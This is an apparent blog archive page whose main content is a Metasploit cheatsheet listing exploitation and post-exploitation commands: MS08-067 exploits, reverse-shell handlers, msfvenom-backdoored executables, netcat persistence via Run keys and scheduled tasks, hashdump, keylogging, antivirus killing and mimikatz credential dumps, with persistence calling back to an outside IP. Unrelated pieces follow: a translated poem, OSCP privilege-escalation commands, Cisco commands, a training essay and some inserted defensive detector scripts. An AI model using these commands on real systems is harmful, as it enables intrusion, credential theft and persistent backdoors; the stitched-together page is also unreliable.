Tuesday, June 28, 2022

METASPLOIT CHEATSHEET

 


Commands Only (Not for Script Kiddies):

1. Hacking Windows XP with Metasploit tutorial - VNC remote control

use windows/smb/ms08_067_netapi
show options
set RHOST 192.168.1.1
set payload windows/vncinject/bind_tcp
exploit


2. Metasploit vs Windows 7 and AVG
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 5555
exploit
ps
migrate 1880
cd c:\\
ls
download program-7.exe /root
run killav
shell


3. Hacking with Metasploit: Windows XP SP3, with B14CK_B34RD
use windows/smb/ms08_067_netapi
set LHOST 192.168.1.10
set RHOST 192.168.1.1
set payload windows/meterpreter/reverse_tcp
exploit


4. Hacking Win7 with Metasploit
nmap -sS -v -PN 192.168.1-255
use exploit/multi/handler
set LHOST 192.168.1.10
set LPORT 5555
set payload windows/meterpreter/reverse_tcp
show options
set ExitOnSession false
show options
set RHOST 192.168.1.1
set RPORT 4321
show options
exploit


5. Metasploit --- Exploiting a vulnerability in Windows 7
sudo nmap 192.168.---check the target with nmap------>445/tcp open microsoft-ds
use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh
set RHOST 192.168.1.1
set RPORT 445
run ----run the exploit


6. Metasploit backdooring
msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 R | ./msfencode -t exe -x /tmp/kislay.exe -k -o /tmp/putty_pro.exe -e x86/shikata_ga_nai -c 5
root@b14ck# cd /tmp ----> kislay.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
show options
exploit

meterpreter >
?
getuid
use priv
hashdump
keyscan_start
keyscan_dump
sysinfo
msg * ------->msg displayed on the screen


7. MS10-025 Metasploit exploitation
nmap -O 192.168.1.7-----see the target operating system
search ms10
use exploit/windows/mmsp/ms10_025_wmss_connect_funnel
set payload windows/shell_bind_tcp
show options
set RHOST 192.168.1.1
exploit


8. IEPeers: ms10_018_ie_behaviors Exploit
search iepeers
use windows/browser/ms10_018_ie_behaviors
set PAYLOAD windows/exec
show options
set SRVHOST 192.168.1.1
set URIPATH /
set CMD calc.exe
set target 1
info ----> Available targets: 1 IE 6 SP0-SP2 (onclick)
exploit
using url: http://192.168.1.1:8080/
open the browser (Mozilla or whichever browser is used)
type: http://192.168.1.1:8080/ --- enter
wait a few moments...


9. metasploit rpc_dum
nmap -sS 192.168...
135/TCP open
use msrpc_dcom_ms03_026
set payload win32_reverse_meterpreter
show options
set RHOST 192.168.1.1
set LHOST 192.168.1.10
exploit
help
use -m process
execute -f cmd.exe -c
interact 1
c:\winnt\system32\>dir


10. Uploading a Netcat backdoor with Metasploit
meterpreter> upload netcat.exe c:\\WINDOWS\\SYSTEM32\\
meterpreter> reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run
meterpreter> reg setval -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run -v "windows live" -d "c:\\WINDOWS\\SYSTEM32\\netcat.exe -L -d -p 5555 -e cmd.exe"
meterpreter> reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run
meterpreter> reboot
bt~# nc 192.168.1.1 5555


11. BackTrack 4 R1 Metasploit 3 & SET, Hacking Windows 7
cd /pentest/exploits/SET
./set
Enter your choice: 4
enter the IP address: 192.168.1.1
enter choice (hit enter for default): 2
enter choice (hit enter for default): 16
set port 4444
open Konqueror /pentest/exploits/SET/
media/sda3---------->msf.exe
cd /pentest/exploits/SET# cd ..
/pentest/exploits# cd framework3
./msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168..
set lport 4444
exploit
use priv
help
execute -f cmd
ipconfig
shell
screenshot
execute -f explorer


12. MS08-067 + Netcat backdoor
use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST
set LHOST
exploit
upload /root/nc.exe c:\\WINDOWS\\SYSTEM32\\

MORE Advanced Phun:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST rmccurdy.com
set LPORT 21
set ExitOnSession false
# set AutoRunScript pathto script you want to autorun after exploit is run
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30

exploit -j -z

____________________________________________________________________

# file_autopwn
rm -Rf /tmp/1
mkdir /tmp/1
rm -Rf ~/.msf3

wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressR...s/nga10_02.pdf

./msfconsole

db_driver sqlite3
db_create pentest11
setg LHOST 75.139.158.51
setg LPORT 21
setg SRVPORT 21
setg LPORT_WIN32 21

setg INFILENAME /tmp/file3.pdf


use auxiliary/server/file_autopwn

set OUTPATH /tmp/1

set URIPATH /msf
set SSL true
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
setg PAYLOAD windows/meterpreter/reverse_tcp
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
run

________________________________________________________________________

# shows all the scripts
run [tab]

________________________________________________________________________

# persistence! broken if you use a DNS name ..
run persistence -r 75.139.158.51 -p 21 -A -X -i 30

________________________________________________________________________

run get_pidgin_creds

idletime
sysinfo

________________________________________________________________________

# SYSTEM SHELL ( pick a proc that is run by system )
migrate 376
shell

________________________________________________________________________

# session hijack tokens
use incognito
impersonate_token "NT AUTHORITY\\SYSTEM"

________________________________________________________________________

# escalate to system
use priv
getsystem

________________________________________________________________________

execute -f cmd.exe -H -c -i -t
execute -f cmd.exe -i -t

________________________________________________________________________

# list top used apps
run prefetchtool -x 20
________________________________________________________________________
# list installed apps
run prefetchtool -p
________________________________________________________________________
run get_local_subnets
________________________________________________________________________
# find and download files
run search_dwld "%USERPROFILE%\\my documents" passwd
run search_dwld "%USERPROFILE%\\desktop" passwd
run search_dwld "%USERPROFILE%\\my documents" office
run search_dwld "%USERPROFILE%\\desktop" office
________________________________________________________________________
# alternate
download -r "%USERPROFILE%\\desktop" ~/
download -r "%USERPROFILE%\\my documents" ~/
________________________________________________________________________
# alternate to shell not SYSTEM
# execute -f cmd.exe -H -c -i -t
________________________________________________________________________

# runs wmic commands etc.
run winenum
________________________________________________________________________


# rev shell the hard way
run scheduleme -m 1 -u /tmp/nc.exe -o "-e cmd.exe -L -p 8080"
________________________________________________________________________
# An example of a run of the file to download via tftp of Netcat and then running it as a backdoor.
run schtasksabuse-dev -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
run schtasksabuse -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
________________________________________________________________________
# vnc / port fwd for linux
run vnc
________________________________________________________________________
# priv esc
run kitrap0d

________________________________________________________________________

run getgui
________________________________________________________________________
# somewhat broken .. google sdt cleaner NtTerminateProcess !@?!?!
run killav

run winenum

run memdump

run screen_unlock
_________________________________________________________________________
upload /tmp/system32.exe C:\\windows\\system32\\
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v system32 -d "C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe"
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v system32
reg enumkey -k HKLM\\system\\controlset001\\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list
reg setval -k HKLM\\system\\controlset001\\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v sys
reg queryval -k HKLM\\system\\controlset001\\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v system32
upload /neo/wallpaper1.bmp "C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\"

__________________________________________________________________________


getuid
ps
getpid
keyscan_start
keyscan_dump
migrate 520
portfwd add -L 104.4.4 -l 6666 -r 192.168.1.1 -p 80
portfwd add -L 192.168.1.1 -l -r 10.5.5.5 -p 6666
___________________________________________________________________________
shell
run myremotefileserver_mserver -h
run myremotefileserver_mserver -p 8787
___________________________________________________________________________
run msf_bind
run msf_bind -p 1975
rev2self
getuid
___________________________________________________________________________
getuid



enumdesktops
grabdesktop

run deploymsf -f framework-3.3-dev.exe

run hashdump
run metsvc
run scraper
run checkvm
run keylogrecorder
run netenum -fl -hl localhostlist.txt -d google.com
run netenum -rl -r 10.192.0.50-10.192.0.254
run netenum -st -d google.com
run netenum -ps -r 10.192.0.50-254

________________________________________________________________________
# Windows Login Brute Force Meterpreter Script
run winbf -h
________________________________________________________________________
# upload a script or executable and run it
uploadexec

________________________________________________________________________
# Using Payload As A Backdoor from a shell

REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\metabkdr.exe" /f
at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\metabkdr.exe"
SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\metabkdr.exe" /ED 11/11/2011
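Added example (mine, not from the cheatsheet): a small detector for the artefacts the Run-key and scheduled-task persistence above leaves behind (the reg setval lines in sections 10 and 12, and the REG add / at / SCHTASKS lines just above). It runs over constructed, Sysmon-style event lines embedded inline; the field names follow Sysmon EventID 13 (registry value set) and Security EventID 4698 (scheduled task created), and the sample paths, task names and the pentest3 user are assumptions, not telemetry from any host on this page.

```python
import re
from typing import Dict, List

# One "Key=Value Key=Value ..." line per event; values may contain spaces,
# so a value runs until the next " Key=" token or the end of the line.
FIELD_RE = re.compile(r'(\w+)=(.*?)(?=\s+\w+=|$)')
RUN_KEY_RE = re.compile(r'\\CurrentVersion\\(Run|RunOnce)\\', re.IGNORECASE)
# Shell hand-off markers seen in the commands above: a netcat binary or "-e cmd.exe".
SHELL_RE = re.compile(r'(?i)\b(nc|netcat)\.exe\b|\s-e\s+cmd(\.exe)?\b')
# Locations an unprivileged user can write to; an autostart binary there is suspect.
USER_WRITABLE_RE = re.compile(
    r'(?i)(%USERPROFILE%|%TEMP%|%APPDATA%|\\Users\\|\\AppData\\|\\Temp\\|\\ProgramData\\)')

# Constructed sample events (hypothetical, not captured telemetry). The first
# and third mirror the reg setval and SCHTASKS lines above; the other two are
# benign autostarts that the rules must leave alone.
SAMPLE_EVENTS = [
    r'EventID=13 Image=C:\Windows\System32\reg.exe '
    r'TargetObject=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system32 '
    r'Details=C:\windows\system32\system32.exe -Ldp 455 -e cmd.exe',
    r'EventID=13 Image=C:\Program Files\Vendor\updater.exe '
    r'TargetObject=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorUpdate '
    r'Details=C:\Program Files\Vendor\updater.exe /background',
    r'EventID=4698 SubjectUserName=pentest3 TaskName=\FIREWALL '
    r'Command=%USERPROFILE%\metabkdr.exe',
    r'EventID=4698 SubjectUserName=SYSTEM TaskName=\Microsoft\Windows\Defrag\ScheduledDefrag '
    r'Command=%windir%\system32\defrag.exe',
]


def parse_event(line: str) -> Dict[str, str]:
    """Split one event line into a field dict."""
    return {key: value.strip() for key, value in FIELD_RE.findall(line)}


def command_reasons(command: str) -> List[str]:
    """Why an autostart command looks like a backdoor rather than installed software."""
    reasons = []
    if SHELL_RE.search(command):
        reasons.append('hands a shell to a network listener')
    if USER_WRITABLE_RE.search(command):
        reasons.append('runs a binary from a user-writable location')
    return reasons


def analyze(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per persistence artefact worth an analyst's attention."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        event = parse_event(line)
        event_id = event.get('EventID')
        if event_id == '13' and RUN_KEY_RE.search(event.get('TargetObject', '')):
            reasons = command_reasons(event.get('Details', ''))
            # Installers write Run values through their own setup binary; a value
            # written by reg.exe (as in the cheatsheet) is unusual on its own.
            if event.get('Image', '').lower().endswith('\\reg.exe'):
                reasons.append('Run value written with reg.exe')
            if reasons:
                findings.append({'type': 'run_key', 'where': event['TargetObject'],
                                 'command': event.get('Details', ''), 'reasons': reasons})
        elif event_id == '4698':
            reasons = command_reasons(event.get('Command', ''))
            if reasons:
                findings.append({'type': 'scheduled_task', 'where': event.get('TaskName', ''),
                                 'command': event.get('Command', ''), 'reasons': reasons,
                                 'by': event.get('SubjectUserName', '')})
    return findings


if __name__ == '__main__':
    for finding in analyze(SAMPLE_EVENTS):
        print(f"{finding['type']:15} {finding['where']}: {'; '.join(finding['reasons'])}")
```

Run as a script it prints the two findings (the Run value carrying `-e cmd.exe`, written by reg.exe, and the task launching a binary from %USERPROFILE%); the vendor updater and the built-in defrag task produce nothing. Feeding real Sysmon output means exporting the events with the same field names, which is what the constructed lines imitate.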

_________________________________________________________________________

# kill AV: this will not unload it from memory, it still needs a reboot or a kill from memory ... Darkspy, Seem, Icesword GUI can kill the tasks
catchme.exe -K "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -E "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -O "c:\Program Files\Kaspersky\avp.exe" dummy
__________________________________________________________________________

email me@ pris@tyrellcorp.net

Monday, June 27, 2022

Decebal to his people

5 November 2012

Coșbuc: This life is a good that is lost
When you don't live it as you would have wished!
And now a butcher nation would like
To throw a yoke around your neck:
It is bad enough that we were born,
Do we want a second evil too?

Even were we descended from gods,
We still owe one death!
It is all the same whether you died
A young man or a hunched old man;
But it is not the same to die a lion
Or a chained dog.

Those who fight while grumbling,
Even if they fought in the front rank,
Seem to us just as good
As any cowardly deserter!
Grumbling, today and at any time,
Is weeping in vain!

And keeping silent, even cowards know how!
All the dead are silent! But whoever is alive,
Let him laugh! The good laugh and fall!
So let us laugh, brave offspring,
Let there be a roar of laughter and a shout
From the heavens down to hell!

Though blood should flow like a stream,
Your arm is unconquered
When you do not flinch in the face of death!
And you seem a god to yourself
When you laugh at what your strong enemies
Fear the most.

They are Romans! And what else are they?
Not they, but were the Holy One,
Zamolxe, to come with a whole people
Of gods, we would ask them: what do they want?
And not even to them would we give land,
For they have their own heaven!

And now, men, an iron and a shield!
It is bad enough that we were born:
But whoever is afraid of war
Is free to turn back,
And whoever is a sold-out traitor,
Let him leave our ranks!

I have nothing more to say!
Swearing, you have laid your arms
Upon the shield! The power is in you
And in the gods! But remember, heroes,
That the gods are far away, above,
And the enemies are beside us!


OSCP PWK privilege escalation commands

execute -H -i -c -m -d calc.exe -f "c:\\Mcafee\\mimikatz.exe" -a '"sekurlsa::logonPasswords full" exit'

msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=10.0.0.100 LPORT=443 -x wordpad.exe -k -f exe -o wordpad1.exe

msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyX.exe

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai LHOST=192.168.2.7 LPORT=443 -f exe -o iexplore.exe

sc config upnphost binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"

sc config upnphost binpath= "C:\McAfee\iexplore.exe -e C:\WINDOWS\System32\cmd.exe"


accesschk.exe /accepteula -uwcqv "Authenticated Users" *

Another tweak to the runas technique is to use a PowerShell one-liner, so the user gets a prompt from a known signed exe rather than an unknown yellow warning prompt.

sc config upnphost binpath= "C:\McAfee\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\spoolsv.exe"
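Added example (not from the OSCP notes): a defender-side audit for the two weaknesses the sc config and accesschk lines above depend on, a service ACL that lets Authenticated Users reconfigure the service, and a binary path that no longer points at a trusted system binary but at a shell relay. It parses constructed text in the layout of `accesschk -v` and `sc qc` output; the sample services, rights and paths are assumptions constructed here, not output from a real host.

```python
import re
from typing import Dict, List, Set

# Rights that let the principal rewrite the service's binary path, start it
# afterwards, or take over its ACL. Any of these on a service that runs as
# LocalSystem is the privilege-escalation path the sc config lines rely on.
DANGEROUS_RIGHTS = {'SERVICE_ALL_ACCESS', 'SERVICE_CHANGE_CONFIG',
                    'WRITE_DAC', 'WRITE_OWNER', 'GENERIC_ALL', 'GENERIC_WRITE'}
TRUSTED_DIRS = ('c:\\windows\\', 'c:\\program files\\', 'c:\\program files (x86)\\')
# A netcat binary, or "-e ...cmd.exe", in a service path is a shell relay, not a service.
SHELL_RE = re.compile(r'(?i)\b(nc|netcat)\.exe\b|\s-e\s+\S*cmd\.exe\b')

# Constructed sample in the layout accesschk prints with -v: the service name
# prefixed by its R/W flags, then one right per indented line. Not real output.
ACCESSCHK_SAMPLE = """\
RW upnphost
        SERVICE_ALL_ACCESS
RW SSDPSRV
        SERVICE_CHANGE_CONFIG
        SERVICE_START
R  Spooler
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
"""

# Constructed `sc qc <name>` output for the same three services; upnphost
# carries the binary path the first sc config line above would set.
SC_QC_SAMPLES = {
    'upnphost': r"""
SERVICE_NAME: upnphost
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 3   DEMAND_START
        BINARY_PATH_NAME   : C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe
        DISPLAY_NAME       : UPnP Device Host
        SERVICE_START_NAME : LocalSystem
""",
    'SSDPSRV': r"""
SERVICE_NAME: SSDPSRV
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
        SERVICE_START_NAME : NT AUTHORITY\LocalService
""",
    'Spooler': r"""
SERVICE_NAME: Spooler
        BINARY_PATH_NAME   : C:\Windows\System32\spoolsv.exe
        SERVICE_START_NAME : LocalSystem
""",
}


def parse_accesschk(text: str) -> Dict[str, Set[str]]:
    """Map service name -> rights the queried principal holds."""
    rights: Dict[str, Set[str]] = {}
    current = None
    for line in text.splitlines():
        header = re.match(r'^(R|W|RW)\s+(\S+)\s*$', line)
        if header:
            current = header.group(2)
            rights[current] = set()
        elif current and line.startswith(' '):
            rights[current].add(line.strip())
    return rights


def parse_sc_qc(text: str) -> Dict[str, str]:
    """Pull the indented 'KEY : VALUE' pairs out of `sc qc` output."""
    fields: Dict[str, str] = {}
    for line in text.splitlines():
        pair = re.match(r'^\s+([A-Z_]+)\s*:\s*(.*)$', line)
        if pair:
            fields[pair.group(1)] = pair.group(2).strip()
    return fields


def binary_of(binpath: str) -> str:
    """First token of BINARY_PATH_NAME, honouring a quoted path."""
    binpath = binpath.strip()
    if binpath.startswith('"'):
        return binpath[1:binpath.find('"', 1)]
    return binpath.split(' ', 1)[0]


def audit(accesschk_text: str, sc_qc_outputs: Dict[str, str],
          principal: str = 'Authenticated Users') -> List[Dict[str, object]]:
    """One finding per service whose ACL or binary path needs attention."""
    findings: List[Dict[str, object]] = []
    writable = parse_accesschk(accesschk_text)
    for name, qc_text in sc_qc_outputs.items():
        fields = parse_sc_qc(qc_text)
        issues: List[str] = []
        held = writable.get(name, set()) & DANGEROUS_RIGHTS
        if held:
            issues.append(f'reconfigurable by {principal}: ' + ', '.join(sorted(held)))
        binpath = fields.get('BINARY_PATH_NAME', '')
        exe = binary_of(binpath).lower()
        if exe and not exe.startswith(TRUSTED_DIRS):
            issues.append('binary outside trusted directories: ' + exe)
        if SHELL_RE.search(binpath):
            issues.append('binary path hands a shell to a network listener')
        if issues:
            findings.append({'service': name, 'runs_as': fields.get('SERVICE_START_NAME', ''),
                             'issues': issues})
    return findings


if __name__ == '__main__':
    for finding in audit(ACCESSCHK_SAMPLE, SC_QC_SAMPLES):
        print(f"{finding['service']} (runs as {finding['runs_as']}): {'; '.join(finding['issues'])}")
```

On the constructed data upnphost is reported for all three reasons and SSDPSRV only for its ACL (SERVICE_CHANGE_CONFIG alone is enough to rewrite the path); Spooler, readable but not writable and pointing at a System32 binary, is clean. The ACL finding is the one to fix first, since it is what makes the other two possible.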

msfpayload windows/shell_reverse_tcp lhost='127.0.0.1' lport='9988' D > /root/Desktop/evil.dll

msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -f dll -o evil.dll

Daily useful Cisco commands

show running-config interface gigabitEthernet 2/0/14

show mac address-table interface gigabitEthernet 2/0/14

show mac address-table address 0014.6a7c.c2b8

show interfaces gigabitEthernet 2/0/14

#########
US-2960XR-STACK#show interfaces gigabitEthernet 2/0/14 switchport
Name: Gi2/0/14
Switchport: Enabled
Administrative Mode: static access
Operational Mode: static access
Administrative Trunking Encapsulation: dot1q
Operational Trunking Encapsulation: native
Negotiation of Trunking: Off
Access Mode VLAN: 12 (MG)
Trunking Native Mode VLAN: 1 (default)
Administrative Native VLAN tagging: enabled
Voice VLAN: 248 (SA-VOIP)
Administrative private-vlan host-association: none
Administrative private-vlan mapping: none
Administrative private-vlan trunk native VLAN: none
Administrative private-vlan trunk Native VLAN tagging: enabled
Administrative private-vlan trunk encapsulation: dot1q
Administrative private-vlan trunk normal VLANs: none
Administrative private-vlan trunk associations: none
Administrative private-vlan trunk mappings: none
Operational private-vlan: none
Trunking VLANs Enabled: ALL
Pruning VLANs Enabled: 2-1001
Capture Mode Disabled
Capture VLANs Allowed: ALL

Protected: false
Unknown unicast blocked: disabled
Unknown multicast blocked: disabled
Appliance trust: none
########

US-2960XR-STACK#show interfaces gigabitEthernet 2/0/14 status

Port      Name        Status       Vlan       Duplex  Speed   Type
Gi2/0/14  MG-cell     connected    12         a-full  a-1000  10/100/1000BaseTX

#######

US-2960XR-STACK#show interfaces description

######## Unused Cisco Ports Lake Forest ##############

show int | i proto.*notconnect|proto.*administratively down|Last in.* [6-9]w|Last in.*[0-9][0-9]w|[0-9]y|disabled|Last input never, output never, output hang never

Last input never, output never, output hang never
  Last input 45w1d, output 00:00:00, output hang never
  Last input 50w3d, output 00:00:00, output hang never
GigabitEthernet1/0/30 is down, line protocol is down (notconnect)
  Last input never, output 10w5d, output hang never
GigabitEthernet1/0/32 is down, line protocol is down (notconnect)
  Last input 11w2d, output 3d04h, output hang never
GigabitEthernet1/0/34 is down, line protocol is down (notconnect)
GigabitEthernet1/0/35 is administratively down, line protocol is down (disabled)
  Last input never, output never, output hang never
GigabitEthernet1/0/42 is down, line protocol is down (notconnect)
  Last input never, output never, output hang never
GigabitEthernet1/0/44 is down, line protocol is down (notconnect)
  Last input 22w3d, output 22w0d, output hang never
GigabitEthernet1/0/45 is down, line protocol is down (notconnect)
  Last input never, output never, output hang never
GigabitEthernet1/0/47 is down, line protocol is down (notconnect)
  Last input 22w3d, output 22w0d, output hang never
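Added example (not part of the post): the unused-port filter above as a parser, so the candidates can be reviewed and turned into shutdown commands instead of read off a grep. It generalizes the fixed "6 weeks or more" pattern in the `show int | i ...` line into a threshold parameter. The `show interfaces` excerpt is constructed in the layout of the output above (interface names, ages and the MAC address are assumptions); other lines of the real command output are ignored.

```python
import re
from typing import Dict, List

IFACE_RE = re.compile(
    r'^(\S+) is (up|down|administratively down), line protocol is (up|down)(?: \((\w+)\))?')
LAST_RE = re.compile(r'^\s+Last input (\S+), output (\S+), output hang (\S+)')
UPTIME_RE = re.compile(r'^(?:(\d+)y)?(?:(\d+)w)?(?:(\d+)d)?(?:(\d+)h)?$')

# Constructed excerpt (not captured from the switch on this page).
SAMPLE_SHOW_INTERFACES = """\
GigabitEthernet1/0/14 is up, line protocol is up (connected)
  Hardware is Gigabit Ethernet, address is 0000.0c00.0001 (bia 0000.0c00.0001)
  Last input 00:00:01, output 00:00:00, output hang never
GigabitEthernet1/0/30 is down, line protocol is down (notconnect)
  Last input never, output 10w5d, output hang never
GigabitEthernet1/0/32 is down, line protocol is down (notconnect)
  Last input 11w2d, output 3d04h, output hang never
GigabitEthernet1/0/35 is administratively down, line protocol is down (disabled)
  Last input never, output never, output hang never
GigabitEthernet1/0/40 is down, line protocol is down (notconnect)
  Last input 3w2d, output 00:00:00, output hang never
GigabitEthernet1/0/44 is down, line protocol is down (notconnect)
  Last input 22w3d, output 22w0d, output hang never
"""


def age_days(token: str) -> float:
    """Convert an IOS age such as 'never', '45w1d', '3d04h' or '00:00:05' to days."""
    if token == 'never':
        return float('inf')
    clock = re.match(r'^(\d+):(\d+):(\d+)$', token)
    if clock:
        hours, minutes, seconds = (int(x) for x in clock.groups())
        return (hours * 3600 + minutes * 60 + seconds) / 86400
    parts = UPTIME_RE.match(token)
    if not parts or not any(parts.groups()):
        raise ValueError(f'unrecognised age token: {token!r}')
    years, weeks, days, hours = (int(x) if x else 0 for x in parts.groups())
    return years * 365 + weeks * 7 + days + hours / 24


def parse_show_interfaces(text: str) -> List[Dict[str, str]]:
    """Collect interface, state, reason and last input/output from `show interfaces`."""
    ports: List[Dict[str, str]] = []
    for line in text.splitlines():
        head = IFACE_RE.match(line)
        if head:
            ports.append({'name': head.group(1), 'state': head.group(2),
                          'protocol': head.group(3), 'reason': head.group(4) or '',
                          'last_input': '', 'last_output': ''})
            continue
        last = LAST_RE.match(line)
        if last and ports:
            ports[-1]['last_input'], ports[-1]['last_output'] = last.group(1), last.group(2)
    return ports


def unused_ports(text: str, min_weeks: int = 6) -> List[Dict[str, str]]:
    """Ports that are not up and have seen no input for min_weeks or more (or ever)."""
    return [p for p in parse_show_interfaces(text)
            if p['state'] != 'up' and p['last_input']
            and age_days(p['last_input']) >= min_weeks * 7]


def shutdown_config(ports: List[Dict[str, str]]) -> List[str]:
    """IOS config lines that disable the candidates not already administratively down."""
    lines: List[str] = []
    for p in ports:
        if p['state'] == 'administratively down':
            continue
        lines += [f"interface {p['name']}", ' description UNUSED - shutdown by port audit', ' shutdown']
    return lines


if __name__ == '__main__':
    candidates = unused_ports(SAMPLE_SHOW_INTERFACES)
    for p in candidates:
        print(f"{p['name']:24} {p['state']:22} last input {p['last_input']}")
    print('\n'.join(shutdown_config(candidates)))
```

With the default six-week threshold the sample yields four candidates (1/0/30, 1/0/32, 1/0/35, 1/0/44) and config for the three that are not already shut; 1/0/40 at three weeks is left alone. Shutting unused access ports, rather than leaving them live in an access VLAN, is the hygiene step this audit feeds.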







Why MOST cybersecurity training doesn't work!


There’s been a lot of debate lately about whether or not cyber security training is worth the investment. To engage in this debate, it is important that all parties have a common definition of cyber security training. If we define cyber security training as the act of herding people into a classroom once a year (or upon hire) to sit through the boring, antiquated style of training session that emerged 15-20 years ago, then I would have to agree, don’t bother with the investment. There are studies which prove this style of training doesn’t work.

Unfortunately, as the rest of the cyber security industry has evolved, the basics of cyber security training have pretty much stayed the same. I have actually seen people using the same annual PowerPoint training material for 7+ years. This outdated model of training will not help defend a company against evolving cyber-attacks. But I have also seen companies achieve quantifiable results with new models of cyber security training that employ interactive software modules and games to engage users, coupled with simulated attacks to assess them.

I think it is more accurate to say that security professionals know that traditional training isn’t working, but they have not found other options. They either aren’t willing to invest the time to update the content, or aren’t willing to invest money to change the training methods.

Why does most cyber security training fail today?

1)      It’s boring;

2)      It lacks user interaction and involvement;

3)      There’s no measurement;

4)      We scare versus teach;

5)      Education is not a security team’s core competency.

However, based on our work with customers and extensive scientific research, security training does yield measurable results. Let’s review in more detail why traditional training fails and how to approach it differently:

Make it engaging -- Traditional cyber security training is boring, out of context, and way too long! With today’s attention-deficient society, training has to evolve to be successful in reducing the threats for an organization. Many of today’s training methods are not compelling to users, and many times the content is so overwhelming that companies lose users a few minutes into the training session. They’ll doze off, start checking their smart phone or politely zone out while looking attentive.

New methods of effective training can provide users with practical advice in a topically focused, software-based training session that takes less than 10 minutes.

Involve the user -- In addition to being boring, there is limited chance for users to interact and actually practice what they learn. Now, I’m not talking about a quiz. Quizzes don’t teach, they test. Answering quiz questions out of context shouldn’t be confused with practice. Practice helps users put concepts to use, so they learn the right behaviors. We all know the scenario: You start the video at your desk, and then go about doing your other day-to-day business. At the end of the video, you guess your way through a few questions, hit enter and hope for the best. If you’re a good guesser... voilà!... you get your shiny new certificate of completion, and the security team can put a check mark on their annual objectives. But was anything learned?

Instead, cutting-edge training deploys interactive techniques where users are asked to practice concepts as they learn them, thereby engaging the user and enforcing learning as they go. For example, employees can complete their session by making decisions in a variety of security scenarios to apply what they’ve just learned, thereby increasing learning retention.

Measure success -- If you don’t measure, how do you know if you are being successful? What valuable data did you collect in the process? Was it actionable? The goal of security training has been to “check the box,” whether for an audit, compliance reasons or to show to your managers that you are doing your job. Successful training needs to be measured and provide actionable data about the strengths and weaknesses in your organization. Anything less is a waste of time.

Effective training collects user interaction and data throughout the training to give security professionals intelligence on an individual employee, as well as aggregate strengths and weaknesses in their organization. This data also helps to show improved knowledge over time.

Enlighten, don’t scare -- For some reason, we have come to believe that we need to scare people to get them to act differently. The problem is that by scaring workers we are actually impacting their ability to get their jobs done. They become afraid to open emails, to access systems and to do their daily jobs. Yes, training needs to break through, but paralyzing an organization in fear is counter-productive. Instead, good training has the potential to empower employees to take full advantage of the Internet’s benefits, while protecting themselves and their employers from potential security breaches.

Use learning science principles -- If you are a hacker, are you automatically an effective teacher? If you know the technology and all of its weaknesses, then it seems reasonable that you should be able to teach the same information to employees, right? Possibly, but not likely. If you ask a bunch of hackers whether training is working, what answer do you expect to get? Everyone has strengths and weaknesses, but generally hackers don’t make good educators and technologists are better off making technology decisions.

If companies want to see results with cyber security training, a shift in mindset is required. The science of learning dates back to the early 1950s, and its techniques have been proven over time and adopted as accepted learning principles. Applied to information security training, these techniques can provide immediate, tangible, long-term results in educating employees and improving your company's overall security posture. Let’s conduct training based on how people actually learn versus treating training as a check-box activity, and we’ll see just how valuable an investment in security training can be.

In the words of Einstein, “Insanity is doing the same thing over and over again and expecting different results.” Thankfully, when it comes to cyber security training it’s possible to stay sane by embracing the advances in security training which are available today.

How to Turn Social Media into a business?


1) Progression
2) Your goal is Steady growth, not fast growth!
3) Become a storyteller
4) Vlogging (video blogging) (to tell a story)

###########

7 Social media platforms:
